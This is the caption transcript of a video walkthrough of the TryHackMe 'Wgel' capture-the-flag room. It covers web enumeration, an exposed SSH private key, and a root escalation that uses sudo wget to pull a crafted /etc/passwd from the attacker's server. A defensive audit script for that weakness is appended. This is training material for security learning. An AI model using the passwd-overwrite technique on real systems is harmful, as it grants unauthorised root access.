TryHackMe! Wget for Privilege Escalation

Captions
Hello everyone, my name is John Hammond, and welcome back to the video. We're going to be taking a look at the Wgel CTF from TryHackMe. So I have this up on my screen here. This is a free room, so you don't need to be subscribed in order to access it. It says simply "have fun with this easy box," and the only prompts we have are user flag and root flag. So once our machine spins up we should just have an IP address to muck around with. I'll clean out some of my notes from a previous video. Looks like that shell super broke, so I'll reset this here, and let's make a directory for Wgel CTF (I think that's how you say that, I have no idea). Let's create a simple README file for this so we can keep track of our notes. I will go ahead and export that IP address here, slap that into my shell, and let's see if I can ping that machine, if he's up already for us. Still taking his time, so let's go ahead and build out our tasks just to have this here: user flag, that should be one, and two should be root flag. So let's burn through this here, let's see what we got. That machine is still spinning up, so let's take a little bit of time. Anyway, we can go ahead and make our nmap directory to stage that and get that ready. We'll also grab that export IP command, and we will start an nmap -sC -sV -oN nmap/initial. Let's run that on the IP address and let's kind of hang tight until that machine comes up for us. Maybe it's also just actually not, I don't know, showcasing pings. We can just go access the web page itself and see if that is alive. Nothing at the moment, so we'll stand by. Are we still connected to our IP address, or our VPN? Are we not? Verifying... okay, looks like it's good. I'll just hang tight and wait, stand by. Okay, looks like he is responding now, so how's that web page look if I were to refresh this guy? Still taking his time. Let's fire off our nmap scan regardless, see if he comes up soon, or if our nmap scan dies as well. Okay, so now this web page seems to load.
It's weird to me, because it's an Apache2 default page, which we see all the time, but it's weird that some of the notions here aren't, like some of the files here aren't filled out. Let's just view the source here. See, we have a lot of CSS, kind of default stuff. Items are commented out: "Jessie don't forget to udate the web..." is it? Okay, so update the website, Jessie. That's a peculiar name. Let's start some other enumeration on that. Let's go ahead and nikto -h on that IP address; he's going along. Let's start gobuster as well. Oh, is that nmap scan done? Didn't find 80, but found SSH and some funky ones, so I guess I'll rerun that. Let's grab this again for this new shell down here and let's do some gobuster. Let's do gobuster -u on that IP address; I'm going to specify my wordlist from /opt, the directory-list one. Let's see if I can figure any of that out. sitemap? What the what? Okay, it's worth seeing if that's a thing, maybe there's some other information that we have not seen before. sitemap gives me a 301 and redirects me somewhere, so let's see if that page loads. "Unapp template"? What the heck. "Take on your biggest projects and goals." So this looks like a whole directory, this is a folder thing. Let's actually restart that gobuster and see if we can figure out anything else inside of sitemap, and I'll bump around in here. "It works" goes to work.html, services... okay, so these are all pages, don't seem to have anything interesting. Contact info, that looks fake: info@yoursite, your website. gobuster found images, good enough. I'm just gonna slowly poke through these. About Unapp, is this actually a video? Let's see. Oh, that's a thing, that's a real thing, that's got timestamps and everything. Let's not play that on my YouTube channel. Dorothy Murphy, no one else, Adam Morris. Adam, what are you doing, dude? That's not how you drink drinks. About, okay, the page does not change when it says services, it's still saying that thing. shop.html, contact.html, can I view contact?
Maybe we can muck around with that form too, that's an option. css, js, automatic backup data... let's check, is there a robots.txt file hidden over any of these? Sometimes it's supposed to be in the root directory, but it's not always. Is there a .git directory in there? No, but like, is it .bzr, or what is it, for Bazaar? There's some weird stuff in there. fonts, so you're just getting stuff at the moment. grid, works with grid. Let's look back at our other enumerations, because we still have nikto running, and nmap finished, looks like it found those. What other options do we have? We can still run dirb, because gobuster is good to have, but dirb also has some other worthwhile dictionary files, like some of the stuff that they share for Apache. These are really cool; if you go take a look at these, it'll have some other files that might be more likely on a web server. So they have one, common I think it's called, and that's in dirb's wordlists, common.txt, that has some good stuff. So let's try him. I'll do the same gobuster -u on my IP address, but I'll use the wordlist from common. Let's see if he finds anything else there. Okay, so .hta. Oh, let's do that in the sitemap, because we know that we have some stuff in there, but we did see the .htpasswd. Let me go take a look at that .htpasswd. I cannot read that. What about .htaccess, maybe? Nope, still no. Okay... oh, what the what, there is a .ssh directory seemingly within sitemap, so let's try and navigate to that, if it loads. Whoa, okay, we have an id_rsa file, so that's a private key. Nice, sweet. So we could try... we don't really need to anymore, let's just make that id_rsa file. And we know that username was Jessie, right? Let me check the page; I thought it was Jessica, that I misread that earlier. Blah blah blah, where'd it go? Jessie, Jessie, Jessie, so that's the name. Okay, so let's actually move, let's call that jessie_id_rsa, and let's make that 600, so it is an SSH key that SSH would be willing to use. Let me grab... I accidentally
nerfed my shell just a moment ago. So, ssh -i jessie_id_rsa jessie@ the IP address, see if that connects. Oh, and it logs me right in. Okay, awesome. So seemingly no flag... oh, that's a lot of stuff. find, grep flag: it's in Documents. cat that flag out, there we go, let's slap that in here. There's our user flag, and we could go ahead and scp some stuff over. So scp -i jessie... let's move LinPEAS over to jessie@, let's grab that IP address, and put this guy in /dev/shm, see if that will work for us. Okay, copied it over just fine, so /dev/shm. Let's try and privesc. I'll run LinPEAS and see if we get any good stuff. Whoa, okay, I already felt like I saw some potential privesc techniques in there. Stuff in my PATH is potentially writable. I am sudo, I'm in the sudo group, what isn't that... whoa, "User jessie may run the following commands," no password on wget. Okay, let's go check out GTFOBins and see if we can do things with wget. wget: file upload, SUID, sudo, "fetch a remote file via HTTP GET." Hmm, I can only file download and file upload, so we could get a root flag, but we could also get a root password; we could set a root password, and that might be kind of cool. Let's do that, let's see if we can pull that off. So, okay, you can stop that, LinPEAS. Let's take this /etc/passwd and let's fake a root password. We could create a simple new entry, or let's modify the root entry in /etc/passwd right here with our own password that we want to supply. So we could do that with Python. I'll get to a regular shell that's on my host, let's go ahead and python, import crypt, and I think it's crypt.crypt and the password we want to use, so I'll just say "please sub" as our password, and let's copy this string. Yep, yep, yep, let's paste that in. So let's call this a password file. So let's get back to the victim. Let's try and actually make a copy of /etc/passwd to /etc/passwd.bak, and I can't do that, so let's put it in /dev/shm so we have a place we can write to.
So if we could download files, we could host our new bad one, our new bad /etc/passwd that has our custom password for root in there, and we could overwrite that, so we have our own password set for us, because we can sudo wget. So sudo wget looks like it works. Let's go spin up a server on our attacker machine, http.server on port 8000. I believe I am still 10.8.91.112, yep, yep, yep. So let's wget http://10.8.91.112 at port 8000, let's grab that password file, and it needs to have -O to where it wants to store it, so let's put it in /etc/passwd. And it wrote it, okay. So let's check out, cat /etc/passwd on the victim, and now we have our fudged password for root. So we could su to root with "please sub" as our password, and we're root. Now we have a root shell, and we wouldn't need to... we could have just exfiltrated, like okay, grab the flag with getting the file and sending it to our own machine, but I think it's much more fun to actually get a root shell. So that technique, just clobbering /etc/passwd with our own set password for an account, will help us do that, because we could write to /etc/passwd, which is pretty cool. Let's go ahead now into root and grab that root flag, cat root flag. Thank you, thank you, and we're done, that's that machine. So pretty cool, super nice, pretty easy. I like that wget privesc. I hope that technique is kind of neat, for just clobbering that /etc/passwd entry. Again, the other option is just exfiltrating that flag out, but kind of neat to get that initial access with finding the username and finding that directory in the flag, or in the website. So that was very, very cool, I think. So hope you guys enjoyed this video, I hope you guys enjoyed this room, I thought it was kind of neat. But again, just wanted to showcase it to you. If you did like the video, please do press that like button, comment button, type things in and hit enter, subscribe button, you know, the picture of my face and all that stupid stuff.
So thanks everybody, I'll see you in the next video. [Music]
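The two things a defender would want to catch from the walkthrough above are the root entry in /etc/passwd carrying an inline hash (what the sudo wget -O overwrite leaves behind) and the NOPASSWD wget grant that made it possible. The audit below is an added example, not from the video or the room; the passwd, sudoers and hash values are constructed samples, and the two awk functions are the only logic.

```shell
# Added defensive audit (not from the video): flag /etc/passwd entries that carry a
# password hash inline instead of the 'x' that defers to /etc/shadow, which is what
# the sudo wget -O /etc/passwd overwrite shown above produces, and list sudoers
# commands granted without a password, the grant that made the overwrite possible.

# Constructed sample standing in for a clean /etc/passwd (not from the target box).
SAMPLE_PASSWD="${TMPDIR:-/tmp}/passwd.sample.$$"
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
jessie:x:1000:1000:jessie,,,:/home/jessie:/bin/bash
EOF

# Constructed "after" sample: root's hash written inline (placeholder, not a real hash).
SAMPLE_CLOBBERED="${TMPDIR:-/tmp}/passwd.clobbered.$$"
cat > "$SAMPLE_CLOBBERED" <<'EOF'
root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
jessie:x:1000:1000:jessie,,,:/home/jessie:/bin/bash
EOF

# Constructed sudoers fragment mirroring the NOPASSWD wget grant found with sudo -l.
SAMPLE_SUDOERS="${TMPDIR:-/tmp}/sudoers.sample.$$"
cat > "$SAMPLE_SUDOERS" <<'EOF'
# User privilege specification
root    ALL=(ALL:ALL) ALL
jessie  ALL=(ALL) NOPASSWD: /usr/bin/wget
EOF

# Print one finding per line: accounts whose password field is empty, or is not 'x'
# or a locked marker ('*', '!', '!!'), plus any non-root account that has UID 0.
passwd_audit() {
    awk -F: '
        $2 == ""                                            { print "empty-password:" $1; next }
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "!!"   { print "inline-hash:" $1 }
        $3 == 0 && $1 != "root"                             { print "uid0:" $1 }
    ' "$1"
}

# Print user:command for every NOPASSWD grant; any command that can write an
# arbitrary file (wget -O among them) is effectively a root grant and should go.
sudoers_nopasswd() {
    awk '
        /^[ \t]*#/ || NF == 0 { next }
        /NOPASSWD:/ { u = $1; sub(/.*NOPASSWD:[ \t]*/, ""); print u ":" $0 }
    ' "$1"
}
```

Run the same two functions against the real /etc/passwd and /etc/sudoers (plus /etc/sudoers.d/*) on a host you administer; a clean system prints nothing from the first and only deliberate, non-file-writing commands from the second.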
Info
Channel: John Hammond
Views: 66,407
Id: fq2EKJ3-fp8
Length: 14min 6sec (846 seconds)
Published: Thu May 14 2020